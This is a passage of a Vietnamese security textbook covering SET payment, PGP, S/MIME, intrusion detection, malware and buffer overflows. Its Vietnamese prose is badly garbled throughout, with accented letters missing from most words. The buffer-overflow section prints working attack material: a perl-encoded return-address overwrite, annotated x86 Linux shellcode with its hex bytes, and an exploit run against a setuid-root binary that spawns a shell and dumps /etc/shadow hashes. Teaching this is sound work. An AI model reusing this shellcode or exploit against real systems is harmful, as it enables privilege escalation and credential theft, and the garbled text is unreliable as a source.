    - 113 VII.3.2 Thanh ton in t an ton 1. Ngi mua m ti khon 2. Ngi mua nhn c chng nhn 3. Ngi bn c chng nhn ca h 4. Ngi mua t hng 5. Ngi bn c kim chng 6. n t hng v tr tin c gi 7. Ngi bn yu cu giy php tr tin 8. Ngi bn duyt n t hng 9. Ngi bn cung cp hng v dch v 10. Ngi bn yu cu tr tin VII.3.3 Ch k kp Ngi mua to ch k kp o Thng tin n t OI cho ngi bn o Thng tin tr tin PI cho ngn hng Khng bn no bit chi tit ca ngi khc. Nhng cn phi bit l h c kt ni vi nhau. S dng ch k kp cho mc ch ny o K trn bn ghp ca OI v PI VII.3.3 Yu cu tr tin Trao i yu cu tr tin gm 4 mu tin sau 1. Khi to yu cu - nhn chng nhn 2. Khi to tr li k tr li 3. Yu cu tr tin - ca OI v PI 4. Tr li tr tin n phc p VII.3.4 Yu cu tr tin ngi mua

    - 114 VII.3.5 Yu cu tr tin ngi bn

    1. Kim tra chng nhn ngi gi th bng ch k ca CA 2. Kim tra ch k kp bng cch s dng kho ch k cng khai ca ngi mua tin tng rng n khng b gi mo khi truyn v c k s dng ch k kho ring ca ngi gi th. 3. X l n t v gi tip thng tin tr tin cho cng tr tin xc thc (m t sau) 4. Gi phn hi tr tin cho ngi gi th VII.3.6 Giy php cng tr tin 1. Kim chng mi chng nhn 2. Gii m phong b in t ca khi giy php v nhn c kho i xng, sau gii m khi giy php 3. Kim tra ch k ca ngi bn trn khi giy php 4. Gii m phong b in t khi tr tin, nhn c kho i xng, sau gii m khi tr tin 5. Kim tra ch k kp trn khi tr tin 6. Kim tra rng, thanh ton ID nhn c t ngi bn ph hp vi danh tnh trong PI nhn c (khng trc tip) t ngi bn 7. Yu cu v nhn c giy php t ni pht hnh 8. Gi tr li giy php cho ngi bn VII.3.7 Nhn tr tin

    - 115 Ngi bn gi cho cng tr tin yu cu nhn tr tin. Cng kim tra yu cu . Sau yu cu chuyn tin n ti khon ngi bn. Thng bo cho ngi bn v ch tr li vic nhn. VII.4 An ton th in t Th in t l mt trong nhng dch v mng c coi trng v ng dng rng ri nht. ng thi ni dung ca cc mu tin khng an ton. C th b quan st trn ng truyn hoc bi nhng ngi c thm quyn thch hp h thng u cui. Nng cao an ton th in t l mc ch quan trng ca mi h thng trao i th. y phi m bo cc yu cu sau: tnh bo mt ni dung tin gi, xc thc ngi gi mu tin, tnh ton vn ca mu tin, hn na bo v khi b sa, tnh chng t chi gc, chng t chi ca ngi gi. VII.4.1 Dch v PGP. PGP (Pretty Good Privacy) l mt dch v v bo mt v xc thc c s dng rng ri cho chun an ton th in t. PGP c pht trin bi Phil Zimmermann. y la chn cc thut ton m ho tt nht dng, tch hp thnh mt chng trnh thng nht, c th chy trn Unix, PC, Macintosh v cc h thng khc. Ban u l mien ph, by gi c cc phin bn thng mi. Sau y chng ta xem xt hot ng ca PGP Thao tc PGP xc thc Ngi gi to mu tin, s dng SHA-1 sinh Hash 160 bit ca mu tin, k hash vi RSA s dng kho ring ca ngi gi v nh km vo mu tin. Ngi nhn s dng RSA vi kho cng khai ca ngi gi gii m v khi phc bn hash. Ngi nhn kim tra mu tin nhn s dng bn hash ca n v so snh vi bn hash c gii m. Thao tc PGP bo mt Ngi gi to mu tin v s ngu nhin 128 bit nh kho phin cho n, m ho mu tin s dng CAST-128/IDEA /3DES trong ch CBC vi kho phiien . Kho phin c m s dng RSA vi kho cng khai ngi nhn v nh km vi mu tin. Ngi nhn s dng RSA vi kho ring gii m v khi phc kho phin. Kho phin c s dng gii m mu tin. Thao tc PGP - Bo mt v xc thc C th s dng c hai dch v trn cng mt mu tin. To ch k v nh vo mu tin, sau m c mu tin v ch k. nh kho phin c m ho RSA/ElGamal. Thao tc PGP nn Theo mc nh PGP nn mu tin sau khi k nhng trc khi m. Nh vy cn lu mu tin cha nn v ch k kim chng v sau. V rng nn l khng duy nht. y s dng thut ton nn ZIP. Thao tc PGP tng thch th in t Khi s dng PGP s c d liu nh phn gi (mu tin c m). Tuy nhin th in t c th thit k ch cho vn bn. V vy PGP cn m d liu nh phn th vo cc k t

    - 116 ASCII in c. Sau s dng thut ton Radix 64, nh x 3 byte vo 4 k t in c v b sung kim tra tha quay vng CRC pht hin li khi truyn. PGP s chia on mu tin nu n qu ln. Tm li, cn c kho phin cho mi mu tin, c kch thc khc nhau: 56 bit DES, 128 bit CAST hoc IDEA, 168 bit Triple DES, c sinh ra s dng d liu u vo ngu nhin ly t s dng trc v thi gian g bn phm ca ngi s dng

    Kho ring v cng khai ca PGP V c nhiu kho ring v kho cng khai c th c s dng, nn cn phi xc nh r ci no c dng m kho phin trong mu tin. C th gi kho cng khai y vi tng mu tin. Nhng u l khng , v cn phi nu r danh tnh ca ngi gi. Do c th s dng nh danh kho xc nh ngi gi. C t nht 64 bit c ngha ca kho v l duy nht, c th s dng nh danh ca kho trong ch k.

    - 117 -

    PGP Message Format Cc chm kho PGP Mi ngi s dng PGP c mt cp chm kho. Chm kho cng khai cha mi kho cng khai ca cc ngi s dng PGP khc c ngi bit v c nh s bng nh danh kho (ID key). Chm kho ring cha cc cp kho cng khai/ring ca ngi c nh s bi nh danh kho v m ca kho ly t giai on duyt hash. An ton ca kho cng khai nh vy ph thuc vo an ton ca giai on duyt. Sinh mu tin PGP S sau m t qui trnh sinh mu tin PGP gi cho ngi nhn.

    - 118 Nhn mu tin

    PGP S sau nu cch ngi nhn gii m, kim chng thng tin c mu tin.

    Qun l kho PGP Tt hn ht da vo ch quyn chng nhn. Trong PGP mi ngi s dng c mt CA ca mnh. C th k kho cho ngi s dng m anh ta bit trc tip. To thnh Web ca nim tin. Cn tin cy kha c k, v tin cy cc kho m cc ngi khc k khi dng mt dy chuyn cc ch k n n. Chm kho ch c cc ch dn tin cy. Ngi s dng c th thu hi kho ca h

    - 119 VII.4.2 M rng th Internet a mc ch/an ton S/MIME Tng cng an ton cho th in t a mc ch m rng MIME (Multipurpose Internet Mail Extension). Th in t Internet RFC822 gc ch c vn bn, MIME cung cp h tr cho nhiu kiu ni dung v mu tin c nhiu phn vi m ho d liu nh phn thnh dng vn bn. S/MIME tng cng tnh an ton, c h tr ca S/MIME trong nhiu tc nhn th in t nh MS Outlook, Mozilla, Mac Mail, Cc chc nng S/MIME D liu ng phong b, ni dung c m ho v lin kt kho, d liu c k, mu tin c m v k sau nn, d liu r rng c k, mu tin tng minh v m ho ch k trn bn nn, d liu ng phong b v k, lng nhau cc th c th k v m. Cc thut ton m ho S/MIME Cc ch k in t DSS v RSA, cc hm hash: SHA-1 v MD5, m kho phin: Elgamal & RSA, m mu tin: AES, Triple-DES, RC2/40, ;MAC: HMAC vi SHA-1. C qu trnh i thoi quyt nh s dng thut ton no. Cc mu tin S/MIME S/MIME bo v cc thc th MIME vi ch k, m hoc c hai to thnh cc i tng ng gi MIME. C phm vi cc kiu ni dung khc nhau: d liu ng phong b, d liu c k, d liu r rng c k, yu cu ng k, chng nhn mu tin. Qu trnh chng nhn S/MIME S/MIME s dng chng nhn X.509 phin bn 3. Qun tr vic s dng kt hp s phn cp CA ca X.509 v Web nim tin ca PGP. Mi client c mt danh sch cc giy chng nhn cho CA tin cy v c cc giy chng nhn v cp kho cng khai/ring ca mnh. Chng nhn cn c k bi cc CA tin cy. Ch quyn chng nhn CA (Certificate Authorities) C mt s CA mi ngi u bit. Verisign l mt CA c s dng rng ri. Verisign xut bn mt s kiu nh danh in t. Tng mc kim tra v ko theo tin cy. Bi tp 1. Nu mc ch IPSec, cc tham s, AH v ESP 2. Nu mc ch SSL v TLS. Trnh by kin trc v nhim v ca cc thnh phn ca chng. 3. Th no l thanh ton in t an ton 4. Nu yu cu ca ch k kp v chng t ch k kp trong thanh ton in t an ton p ng cc yu cu . 5. Nu qui trnh thanh ton in t an ton, chng t n p ng c cc yu cu an ton ra. 6. Nu cc yu cu bo mt, xc thc, ch k in t ca h thng th n t. 7. Trnh by gii php xut ca PGP cho h thng th in t. 8. Tm hiu xc thc c bn HTTP trong Internet Explorer.

    - 120 CHNG 8: K XM NHP, PHN MM C HI V BC TNG LA VIII.1 K xm nhp VIII.1.1 Khi nim Vn quan trng i vi h thng mng l chng li vic truy cp khng mong mun qua mng my tnh ln hoc cc b. Chng ta c th phn loi k xm nhp nh sau: o K gi danh o K lm quyn o Ngi s dng giu mt C nhiu mc kh nng khc nhau xm nhp khc nhau. R rng vn trn c cng khai v tr nn bc xc o T Wily Hacker trong nm 1986/1987 o n vic tng nhanh cc i ng cu tnh trng khn cp ca my tnh Vi i ng cu c th cm thy bnh an nhng i hi cc ngun chi b sung pht trin v duy tr hot ng. K xm nhp c th s dng cc h thng lm hi tn cng. VIII.1.2 Cc k thut xm phm Mc tiu ca k xm nhp l dnh quyn truy cp hoc tng quyn trong h thng. Cc phng php tn cng c bn bao gm o Tm mc tiu v thu thp thng tin o Truy cp ban u o Leo thang quyn o Ln vt khi phc Mc tiu chnh l ginh c mt khu v sau dng quyn truy cp ca ngi s hu. VIII.1.3 on mt khu on mt khu l mt trong cc hng tn cng chung nht. K tn cng bit tn ngi s dng ng nhp (t trang email/web) v tm cch on mt khu. o Mc nh, mt khu ngn, tm kim cc t chung o Thng tin ca ngi dng (thay i tn, ngy sinh, s in thoi, cc mi quan tm v t chung) o Tm kim tng th mi kh nng ca mt khu K xm nhp kim tra ng nhp vi tp mt khu nh cp c. S thnh cng ca vic on mt khu ph thuc vo mt khu c chn bi ngi dng. Tng quan ch ra rng nhiu ngi s dng chn mt khu khng cn thn. Nm bt mt khu Tn cng khc bao gm nm bt mt khu o Theo di qua vai khi nhp password o S dng chng trnh nga thnh Toroa thu thp

    - 121 o Theo di login mng khng an ton, chng hn Telnet, FTP, Web, email. o Cht lc thng tin ghi li c sau ln vo mng thnh cng (m/lch s web, s quay cui,) o S dng login/password ng nhi li ngi s dng Ngi s dng cn c hc dng cc bin php phng v ngn nga thch hp. VIII.1.4 Pht hin xm nhp Chc chn c li an ton u . Nh vy pht hin xm nhp cn phi o Chia khi pht hin nhanh o Hnh ng ngn chn o Thu thp thng tin tng cng an ton Gi thit rng k xm nhp s hnh ng khc so vi ngi dng hp php o Nhng s c s khc bit nh gia h 1. Cc cch tip cn pht hin xm nhp Pht hin thng k bt thng o Vt qua ngng thng k no o Da trn m t Da trn qui tc o Hnh ng bt thng o nh danh thm nhp 2. Kim tra cc bn ghi Cng c c bn pht hin xm nhp l kim tra bn ghi n gin o Mt phn ca h iu hnh a ngi s dng o Sn sng s dng o C th khng c thng tin trong nh dng mong mun Tin hnh kim tra cc bn ghi chuyn dng pht hin o c to chuyn dng thu thp mt s thng tin mong mun o Tr gi chi ph b sung trong h thng 3. Pht hin thng k bt thng Pht hin ngng o m s xut hin ca s kin c bit theo thi gian o Nu vt qu gi tr no th cho l c xm nhp o Nu ch dng n th y l pht hin th khng hiu qu Da trn m t o c trng hnh vi qu kh ca ngi s dng o Pht hin h qu quan trng t o M t bng nhiu tham s 4. Phn tch kim tra bn ghi y l c s ca cch tip cn thng k. Phn tch bn ghi nhn c cc s o theo thi gian o S m, o, thi gian khong, s dng ngun S dng cc kim tra khc nhau trn s liu phn tch xc nh hnh vi hin ti c chp nhn c khng o Tnh k vng, phng sai, bin nhiu chiu, qu trnh Markov, chui thi gian, thao tc

    - 122 u im chnh l khng s dng kin thc bit trc 5. Pht hin xm nhp da trn qui tc Quan st cc s kin trong h thng v p dng cc qui tc quyt nh hot ng c ng nghi ng hay khng. Pht hin bt thng da trn qui tc o Phn tch cc bn ghi kim tra c xc nh mu s dng v qui tc t sinh cho chng o Sau quan st hnh vi hin ti v snh vi cc qui tc nhn thy nu n ph hp o Ging nh pht hin thng k bt thng khng i hi kin thc bit trc v sai lm an ton nh danh s thm nhp da vo qui tc o S dng cng ngh h chuyn gia o Vi qui tc nh danh s xm nhp bit, cc mu im yu, hoc cc hnh vi nghi ng o So snh cc bn ghi kim tra hoc cc trng thi theo qui tc o Qui tc c sinh bi cc chuyn gia nhng ngi phng vn v h thng kin thc ca cc qun tr an ton o Cht lng ph thuc vo cch thc thc hin cc iu trn o tng da trn t l o Thc t pht hin xm nhp h thng cn pht hin t l xm nhp ng vi rt t cnh bo sai Nu rt t s xm nhp c pht hin -> an ton khng tt Nu rt nhiu cnh bo sai -> b qua/ph thi gian o iu rt kh thc hin o Cc h thng tn ti hnh nh khng c cc bn ghi tt Pht hin xm nhp phn tn o Truyn thng thng tp trung h thng n l o Nhng thng thng c cc h thng my tnh o Bo v hiu qu cn lm vic cng nhau pht hin xm nhp o Cc vn Lm vic vi nhiu nh dng bn ghi kim tra khc nhau Ton vn v bo mt d liu trn mng Kin trc tp trung v phn tn S dng bnh mt ong o Chng li thu ht cc k tn cng Tch khi s truy cp n cc h thng then cht thu thp cc thng tin v hot ng ca chng Kch thch k tn cng li trong h thng ngi qun tr c th phn on o c cp y cc thng tin ba t o c trang b thu thp chi tit thng tin v hot ng ca k tn cng o H thng mng n v lp VIII.1.5 Qun tr mt khu o L bo v tuyn u chng k xm nhp o Ngi s dng c cung cp c hai: Login xc nh c quyn ca ngi s dng

    - 123 Password xc nh danh tnh ca h o Passwords thng c lu tr m ho Unix s dng DES lp Cc h thng gn y s dng hm hash o Cn phi bo v file passwords trong h thng Tm hiu v mt khu o Purdue 1992 c nhiu mt khu ngn o Klein 1990 c nhiu mt khu on c o Kt lun l ngi s dng thng chn cc mt khu khng tt o Cn mt cch tip cn chng li iu To mt khu - cn gio dc cch to mt khu o Cn c chnh sch v gio dc ngi s dng o Gio dc tm quan trng ca mt khu tt o Cho nh hng mt khu tt di ti thiu > 6 i hi trn ch hoa v ch thng, s v du chm khng chn t trong t in o Nhng nn chn sao cho nhiu ngi khng To mt khu my tnh t sinh o Cho my tnh t to mt khu o Nu ngu nhin khng d nh, th s vit xung (hi chng nhn kh chu) o Ngay c pht m c cng khng nh o C cu chuyn v vic chp nhn ca ngi s dng ti o FIPS PUB 181 l mt trong nhng b sinh tt nht C c m t v code v d Sinh t vic ghp ngu nhin cc m tit pht m c To mt khu - kim tra trc o Cch tip cn h hn nht c th ci thin an ton mt khu o Cho php ngi s dng chn trc mt khu ca mnh o Nhng cho h thng kim chng xem n c chp nhn c khng Bt buc theo qui tc n gin So snh vi t in cc mt khu ti S dng m hnh thut ton Markov hoc b lc chng cc cch chn ti VIII.2 Phn mm c hi VIII.2.1 Cc kiu phn mm c hi khc ngoi Virus Virus my tnh c cng b rt nhiu, l mt trong nhng phn mm c hi. Tc ng ca n mi ngi u bit, c nu trong cc bo co, vin tng v phim nh, gy nhiu ch hn l tn thng v c quan tm nhiu phng chng. 1. Ca sau hoc ca sp im vo chng trnh b mt, cho php nhng ngi bit truy cp m b qua cc th tc an ton thng thng. K thut ny c th c s dng chung bi nhng ngi pht trin v l mi e do khi trong chng trnh sn phm cho php khai thc

    - 124 bi cc k tn cng. Rt kh ngn chn trong h iu hnh, i hi s pht trin v cp nht phn mm tt. 2. Bom logic y l mt trong nhng phn mm c hi kiu c, code c nhng trong chng trnh hp php. N c kch hot khi gp iu kin xc nh o C mt hoc vng mt mt s file o Ngy thng/thi gian c th o Ngi s dng no Khi c kch hot thng thng n lm hng h thng o Bin i/xo file/a, lm dng my, 3. Nga thnh T roa Chng trnh vi cc tc ng ph c du kn, m thng thng rt hp dn nh tr chi hoc phn mm nng cp. Khi chy thc hin nhng nhim v b sung, cho php k tn cng gin tip dnh quyn truy cp m h khng th trc tip. Thng thng s dng lan truyn virrus/su (worm) hoc ci t ca sau hoc n gin ph hoi d liu. 4. Zombie y l chng trnh b mt iu khin my tnh ca mng khc v s dng n gin tip tin hnh cc tn cng. Thng thng s dng khi ng tn cng t chi cc dch v phn tn (DdoS). Khai thc cc l hng trong cc h thng. VIII.2.2 Virus Virus l on code t sinh lp nh km vi code khc nh virus sinh hc. C hai u lan truyn t n v mang i b ti o Mang theo code to cc bn sao ca chnh n o V cng nh mi code n cng thc hin nhim v ngm no Thao tc ca virus Cc giai on ca virus o Nm im - ch s kin kch hot o Lan truyn lp sinh ra chng trnh/a o Kch hot - bi s kin thc hin b ti o Thc hin b ti o C th thng thng mang tnh cht chuyn bit ca cc my v h iu hnh. N khai thc cc tnh cht v im yu Cu trc Virus program V := {goto main; 1234567; subroutine infect-executable := {loop: file := get-random-executable-file; if (first-line-of-file = 1234567) then goto loop else prepend V to file; } subroutine do-damage := {whatever damage is to be done} subroutine trigger-pulled := {return true if condition holds} main: main-program := {infect-executable; if trigger-pulled then do-damage; goto next;}

    - 125 next: } Cc kiu Virus C th phn loi da trn kiu tn cng o Virus n bm o Virus c tr b nh o Virus sector khi ng o Ln lt o Virus nhiu hnh thi o Virus bin ho 1. Marco Virus Marco code nh km file d liu, c dch bi chng trnh s dng file o Nh marco ca Word/Excel o S dng lnh t ng v lnh marco y l on code l c lp vi nn tng, l on ngun chnh ca s lan nhim virus. C s khc bit khng r rng gia d liu v file chng trnh, thng thng c s tho hip truyn thng: d dng s dng v an ton. c s ci thin an ton trong Word, khng tri hn s e do ca virus. 2. Virus email y l loi virus lan truyn s dng email c nh km cha marco virus nh Melissa. Thng c kch hot khi ngi s dng m file nh km hoc t khi hn khi mail c xem s dng mt tnh cht script ca tc nhn mail. Do s lan truyn rt nhanh, thng thng ch l tc nhn mail Microsoft Outlook hoc ti liu Word /Excel. Cn an ton ng dng v h iu hnh tt hn 3. Su y l chng trnh sinh lp nhng khng c tc ng, thng lan truyn trn mng o Nh su Internet Morris 1988 o Dn n vic to ra cc i ng cu khn cp my tnh CERT o Dng c quyn phn tn hoc khai thc cc im yu h thng o c s dng rng ri bi Hackers to zombie PC, ko theo s dng cc tn cng khc, c bit t chi dich v DoS Vn chnh l mt s an ton ca h thng kt ni thng xuyn nh PC. Thao tc ca su Cc giai on ca su ging nh virus: o Nm im o Lan truyn Tm h thng khc tc ng Thit lp kt ni vi h thng ch t xa T sinh lp mnh cho h thng t xa o Kch hot o Thc hin 4. Su Morrris

    - 126 Su Morris l loi su c in, c to bi Robert Morris vo 1988, nhm ti cc h thng Unix. y s dng mt s k thut lan truyn, nh o Ph mt khu n gin trong file mt khu cc b o Khai thc l hng o Tm li ca sp trong h thng mail Mi tn cng thnh cng s sinh lp n. 5. Tn cng ca su ng thi Ln sng tn cng ca su ng thi mi t gia 2001 nh: - Code Red - s dng l hng MS IIS: o Th IP ngu nhin cho h thng chy IIS o C kch hot thi gian cho tn cng t chi dch v o Ln sng th hai tc ng n 360000 my ch trong vng 14 gi - Code Red 2 ci t ca sp - Nimda c ch tc ng lp - SQL Slammer tn cng my ch MS SQL - Sobig tn cng my ch proxy m - Mydoom su email c s lng ln v c ca sau 6. Cng ngh su Cc c tnh ca cng ngh su l tn cng a nn tng, khai thc nhiu chiu, lan truyn cc nhanh, c nhiu kiu tc ng, bin ho, c ng v khai thc zero day. 7. Cc bin php chng Virus Bin php tt nht l ngn nga, nhng ni chung l khng th. Do cn phi c mt trong nhiu bin php sau: o Pht hin virus nhim trong h thng o nh danh loi virus nhim o Loi b khi phc h thng v trng thi sch 8. Phn mm chng Virus Phn mm thuc th h u tin o Qut s dng ch k ca virus nh danh o Hoc pht hin s thay i di ca chng trnh Phn mm thuc th h th hai o S dng cc qui tc trc quan pht hin nhim virus o S dng m hash ca chng trnh pht hin s thay i Phn mm thuc th h th ba o Chng trnh thng tr trong b nh nh danh virus theo hnh ng Phn mm thuc th h th t ng gi vi rt nhiu kiu k thut chng virus Qut v ln vt tch cc, kim sot truy cp Phng php dit bng tay vn c dng. 9. K thut chng Virus nng cao Gii m mu o S dng m phng CPU kim tra chng trnh, ch k v hnh vi trc khi chy chng Dng H thng min dch s (IBM)

    - 127 o Hnh ng a muc tiu v chng Virus o Mi virus nhp vo t chc c nm bt, phn tch, pht hin/tm chn to ra chng n v loi b Sau y l s H min dch s (Digital Immune System)

    VIII.2.3 Phn mm ngn chn hnh vi Cc phn mm ny c tch hp vi h iu hnh ca my ch. Chng trnh theo di cc hnh vi trong thi gian thc o Chng hn truy cp file, nh dng a, cc ch thc hin, thay i tham s h thng, truy cp mng i vi cc hnh ng c kh nng c hi o Nu pht hin th ngn chn, chm dt hoc tm kim C u im so vi qut, nhng code c hi chy trc khi pht hin. 1. Tn cng t chi dch v t xa Tn cng t chi dch v t xa (DDoS) to thnh e da ng k, lm cho h thng tr nn khng sn sng, lm trn bi s vn chuyn v ch. K tn cng thng s dng mt s ln cc zombies, tng kh ca cc tn cng. Cng ngh bo v tm cc bin php ng u chng li

    - 128 -

    2. Tm hiu cch k th xy dng mng li tn cng t chi dch v t xa T chi dch v c hiu lc khi b nhim rt nhiu zombies. thc hin c iu cn c: - Phn mm ci t tn cng t chi dch v t xa - Cc l hng khng v c trong nhiu h thng - Chin lc qut tm l hng h thng: s dng cc yu t ngu nhin, lp danh sch va chm, tm hiu cu trc topo, mng con cc b. 3. Chng tn cng t chi dch v t xa (DDoS) C ba cch bo v sau y c dng rng ri - Ngn nga tn cng v chim lnh trc. - Pht hin tn cng v lc trong qu trnh s dng dch v - Ln vt ngun tn cng v xc nh s tn cng sau khi s dng xong dch v. Ni chung c phm vi rng cc kh nng tn cng, v vy phi c nhiu bin php chng v s dng kt hp chng. VIII.3 Trn b m Trn b m l c ch tn cng rt ph bin bt u t 1988 xut hin su Morris n Code Red, Slammer, Sasser v nhiu ci khc na. Cc k thut phng chng u bit. Tuy nhin vn cn l vn phi quan tm v di truyn t cc con rp ly lan rng ri. V vn cn cc k thut lp trnh khng cn thn. C s ca vic trn b nh: sinh bi do li lp trnh, cho qu nhiu d liu lu tr hn kh nng cho php trong b m kch thc c nh. B m c th trn ngn xp, ng, d liu tng th. Vit cc v tr nh cn k, lm hng d liu ca chng trnh, truyn iu khin khng mong mun, vi phm truy cp b nh, thc hin code ca k tn cng

    - 129 VIII.3.1 V d trn b nh

    Buffer Overflow Example


    int main( int argc, char * argv[]) { int valid = FALSE; char str1[8]; char str2[8]; next_tag(str1); gets(str2); if (strncmp(str1, str2, 8) == 0) valid = TRUE; printf("buffer1: str1(%s), str2(%s), valid(%d)\n", st r1, str2, valid); } $ cc -g -o buffer1 buffer1.c $ ./buffer1 START buffer1: str1(START), str2(START), valid(1) $ ./buffer1 EVILINPUTVALUE buffer1: str1(TVALUE), str2(EVILINPUTVALUE), valid(0) $ ./buffer1 BADINPUTBADINPUT buffer1: str1(BADINPUT), str2(BADINPUTBADINPUT), valid(1)

    Xt chng trnh C trn. y c ba bin, thng thng lu trong vng nh lin k. Gi chng trnh con copy vo str1 d liu Start. Sau c u vo s dng hm gets lu vo str2. Sau so snh u vo vi xu Start. Nu thnh cng valid = true. Vn hm th vin gets ca C khng kim tra ln d liu c vo. Nu nhiu hn 7 k t n i hi b nh nhiu hn. Khi d liu tha vit d liu ca bin k, trong trng hp ny l str1. Gi s xu u vo l EVILINPUTVALUE, kt qu xu Str1 b vit vi cc k t TVALUE. Xu str2 khng ch s dng 8 k t ca n m cn thm 7 k t t str1. Bit cu trc trn, k tn cng c th thu xp sao cho gi tr xu Str1 vn bng Str2. Chng hn nu nhp xu u vo l BADINPUTBADINPUT th trong php so snh kt qu vn ng nh trong ln chy th ba trong v d trn. VIII.3.2 Tn cng trn b nh. lm trn b m, k tn cng cn phi pht hin l hng trn b m trong chng trnh no . Theo di, ln theo vt thc hin, s dng cc cng c n. Hiu b m lu trong b nh nh th no v xc nh kh nng ph hng.

    - 130 -

    Function Calls and Stack Frames

    Mt cht v lch s ngn ng lp trnh. mc ngn ng my mi d liu l mng cc bytes, thng dch ph thuc vo cc ch lnh c dng. Ngn ng bc cao hin i c nh ngha cht v kiu v cc php ton ng. Khng c l hng trn b m, c lng trc, gii hn khi dng. C v ngn ng lin quan c cu trc iu khin bc cao, nhng cho php truy cp trc tip n b nh. V vy c l hng trn b m. C k tha ln cc code khng an ton, ang c s dng rng ri, nn c l hng. hiu hn to sao li trn b nh, m khng khc phc c, ta xem xt c ch m li gi hm qun l trng thi cc b cho mi li gi. Khi mt hm gi hm khc, n cn phi lu u a ch tr v hm c gi khi kt thc tr iu khin cho hm gi. Bn cnh cng cn c ch ct mt s tham s m cn truyn cho hm c gi v cng cn lu cc gi tr thanh ghi ca hm gi m cn c s dng khi hm c gi kt thc. Thng thng mi d liu ny c ct khung ngn xp (stack frame). Mi ln gi hm li sinh ra mt khung ngn xp lin kt. Trn b m ngn xp xy ra khi b m t trn ngn xp. N c khai thc bi su Morris. Bi bo Smashing the Stack tuyn truyn n. C bin cc b pha di con tr khung lu tr v a ch tr li. V vy trn b m cc b c nhiu kh nng vit cc mc iu khin chnh. K tn cng vit a ch tr v vi a ch ca an code ci vo. c th l a ch ca chng trnh, th vin h thng hoc ti vo b m. Chng ta xem cu to vng nh, ni ct chng trnh ang chy, d liu tng th, ng v ngn xp. Khi chng trnh chy, h iu hnh to ra mt tin trnh cho n. Tin trnh c cho bi khng gian o ca ring n vi cu trc nh trn hnh v sau. N bao gm ni dung chng trnh ang chy, trong c d liu tng th, bng cp b nh, code ca chng trnh gn y ca khng gian nh ny. Trn khng gian cho ng tng dn ln v trn na l khng gian cho ngn xp gim dn xung.

    - 131 -

    Programs and Processes

    m t trn b m ngn xp ta xt chng trnh C sau. N cha bin cc b duy nht, b m inp. Hm Hello nhc nhp tn m c c vo b m nh hm th vin khng an ton gets(). Sau hin kt qu c c nh hm th vin printf (). Nu gi tr nh c c th y khng c vn g. Chng trnh gi hm s chy thnh cng nh trong ln chy th nht trn hnh sau . Nu d liu ln nh trong ln chy th hai, d liu s vt qua cui b m v ghi ln con tr khung lu tr v tr v a ch sai tng ng vi biu din nh phn ca cc k t. V khi hm tr iu khin cho a ch tr v, n nhy n v tr b nh khng hp l, bo li Segmentation Fault v dng chng trnh khng bnh thng nh thng bo trn hnh sau . K tn cng tn dng c hi ny truyn iu khin v chng trnh nh trc.

    - 132 -

    Stack Overflow Example


    void hello(char *tag) { char inp[16];
    printf("Enter value for %s: ", tag); gets(inp); printf("Hello your %s is %s\n", tag, inp);
    }
    $ cc -g -o buffer2 buffer2.c
    $ ./buffer2 Enter value for name: Bill and Lawrie Hello your name is Bill and Lawrie buffer2 done
    $ ./buffer2 Enter value for name: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Segmentation fault (core dumped)
    $ perl -e 'print pack("H*", "414243444546474851525354555657586162636465666768 08fcffbf948304080a4e4e4e4e0a");' | ./buffer2 Enter value for name: Hello your Re?pyy]uEA is ABCDEFGHQRSTUVWXabcdefguyu Enter value for Kyyu: Hello your Kyyu is NNNN Segmentation fault (core dumped)

    VIII.3.3 Code che y (Shellcode) y l code chng trnh c chun b bi k tn cng. N c lu trong b nh b trn v k tn cng tm cch chuyn iu khin sang cho shell.

    Example Shellcode
    cont:

    find: sh: args:

    nop nop jmp find pop %esi xor %eax,%eax mov %al,0x7(%esi) lea (%esi),%ebx mov %ebx,0x8(%esi) mov %eax,0xc(%esi) mov $0xb,%al mov %esi,%ebx lea 0x8(%esi),%ecx lea 0xc(%esi),%edx int $0x80 call cont .string "/bin/sh " .long 0 .long 0

    // // // // // // // // // // // // // // // // //

    end of nop sled jump to end of code pop address of sh off stack into %esi zero contents of EAX copy zero byte to end of string sh (%esi) load address of sh (%esi) into %ebx save address of sh in args[0] (%esi+8) copy zero to args[1] (%esi+c) copy execve syscall number (11) to AL copy address of sh (%esi) t0 %ebx copy address of args (%esi+8) to %ecx copy address of args[1] (%esi+c) to %edx software interrupt to execute syscall call cont which saves next address on stack string constant space used for args array args[1] and also NULL for env array

    90 90 eb 1a 5e 31 c0 88 46 07 8d 1e 89 5e 08 89 46 0c b0 0b 89 f3 8d 4e 08 8d 56 0c cd 80 e8 e1 ff ff ff 2f 62 69 6e 2f 73 68 20 20 20 20 20 20

    - 133 -

    Example Stack Overflow Attack


    $ dir -l buffer4 -rwsr-xr-x 1 root knoppix 16571 Jul 17 10:49 buffer4 $ whoami knoppix $ cat /etc/shadow cat: /etc/shadow: Permission denied $ cat attack1 perl -e 'print pack("H*", "90909090909090909090909090909090 . " "90909090909090909090909090909090 . " "9090eb1a5e31c08846078d1e895e0889 . " "460cb00b89f38d4e088d560ccd80e8e1 . " "ffffff2f62696e2f7368202020202020" . "202020202020202038fcffbfc0fbffbf0a"); print "whoami\n"; print "cat /etc/shadow\n";' $ attack1 | buffer4 Enter value for name: Hello youryyy)DA0Apy is e?^1AFF.../bin/ sh... root root:$1$rNLId4rX$nka7JlxH7.4UJT4l9JRLk1:13346:0:99999:7::: daemon:*:11453:0:99999:7::: ... nobody:*:11453:0:99999:7::: knoppix:$1$FvZSBKBu$EdSFvuuJdKaCH8Y0IdnAv/:13346:0:99999:7::: ...

    Pht trin code che y Trong v d trn m t vi Intel Linux shellcode c bn chy bn dch Bourne shell. Shellcode cn phi ph hp vi i s cho execve(). N bao gm mi code gi hm ca h thng, phi c lp vi v tr v khng cha NULLs xu kt thc ca C. Thng thng chng trnh che y di v bc l tin ch h thng ng tin cy, dch v mng c bit, code th vin c s dng chung, nh hnh nh. Cc hm ca shellcode: giao din t sinh, to i tng nghe khi to giao din kt ni, to kt ni ngc li ti k tn cng, vt qua cc qui tc tng la, thot khi mi trng thc thi hn ch. VIII.3.4 Bo v trn b nh Trn b m c khai thc rng ri, c nhiu code c l hng ang dng. Mc d nguyn nhn v cc bin php chng bit. C hai cch chng rng ri: chng trnh mi c gia c trong thi gian dch v kim sot tn cng chng trnh ang c trong thi gian chy. Nu s dng ngn ng bc cao vi kiu mnh , th s khng c l hng trn b m. Chng trnh dch buc kim tra c v cc thao tc cho php trn cc bin. Khi phi tr gi khi s dng ngun v hn ch truy cp n phn cng. Tuy nhin vn cn mt s code ca cc ngn ng ging C. Bo v trong thi gian dch Thit lp cc k thut lp trnh an ton. 